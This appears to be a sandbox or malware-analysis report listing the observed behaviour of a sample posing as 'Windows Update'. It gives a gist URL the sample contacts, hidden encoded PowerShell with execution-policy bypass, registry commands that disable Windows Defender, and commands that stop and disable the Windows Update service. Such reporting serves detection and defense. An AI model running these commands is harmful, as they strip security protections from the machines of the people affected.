Technical Information
- Windows Update
- https://gist.githubusercontent.com/mysslacc/a5b184d9d002bf04007c4bbd2a53eeea/raw/c6f8b4c36e48425507271962855f3e2ac695f99f/baseba
- 'gi##.###hubusercontent.com':443
- DNS ASK gi##.###hubusercontent.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -w 1 -exec bypass -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQANAAoAYwBtAGQAIAAvAGMAIAByAGUAZwAgAGEAZA...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -w 1 -exec bypass -ec JABjAG8AbQAgAD0AIAAiAFUAdwBCAGwAQQBIAFEAQQBMAFEAQgBOAEEASABBAEEAVQBBAEIAeQBBAEcAVQBBAFoAZwBCAGwAQQBIAEkAQQBaAFEAQgB1AEEARwBNAEEAWgBRAEEAZwBBAEMAMABBAFIAQQBCAHAAQQBIAE0AQQB...
- '%WINDIR%\syswow64\cmd.exe' /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\cmd.exe' /c sc stop wuauserv
- '%WINDIR%\syswow64\sc.exe' stop wuauserv
- '%WINDIR%\syswow64\cmd.exe' /c sc config wuauserv start= disabled
- '%WINDIR%\syswow64\sc.exe' config wuauserv start= disabled